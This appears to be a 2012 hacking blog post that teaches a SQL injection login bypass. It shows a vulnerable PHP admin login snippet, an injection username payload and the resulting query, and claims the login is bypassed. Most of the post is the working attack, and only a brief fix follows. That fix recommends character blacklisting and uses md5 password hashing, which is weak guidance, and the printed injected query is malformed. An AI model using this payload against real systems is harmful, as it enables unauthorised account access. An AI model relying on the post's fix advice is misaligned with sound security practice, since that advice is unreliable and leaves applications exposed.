Home » , » How to bypass Admin/user login through SQL Injection

How to bypass Admin/user login through SQL Injection

Written By Unknown on Thursday, 30 August 2012 | 18:10

- Code snippet from /admin/login.php
 ——————————————————————————————————————————
 $postbruger = $_POST['username'];
$postpass = md5($_POST['password']);
$resultat = mysql_query(“SELECT * FROM ” . $tablestart . “login WHERE brugernavn = ‘$postbruger’ AND password = ‘$postpass’”)
or die(”
” . mysql_error() . “\n”);
——————————————————————————————————————————
The variables isn’t properly checked.We can bypass this login.Lets inject the following username and password :
username : admin ‘ or ‘ 1=1
password : sirgod
We logged in.Why?Look,the code will become
———————————————————————————————————————————
$resultat = mysql_query(“SELECT * FROM ” . $tablestart . “login WHERE brugernavn = ‘admin’ ‘ or ‘ 1=1 AND password = ‘sirgod’”)
———————————————————————————————————————————
Login bypassed.The username must be an existent username.
How to fix?
Simple way : Don’t allow special chars in variables.For numeric variables
use (int) ,example $id=(int)$_GET['id'];
Another way : For non-numeric variables : filter all special chars used in
SQLI : – , . ( ) ‘ ” _ + / * 
Share this article :

Post a Comment

 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. Turorial Grapich Design and Blog Design - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger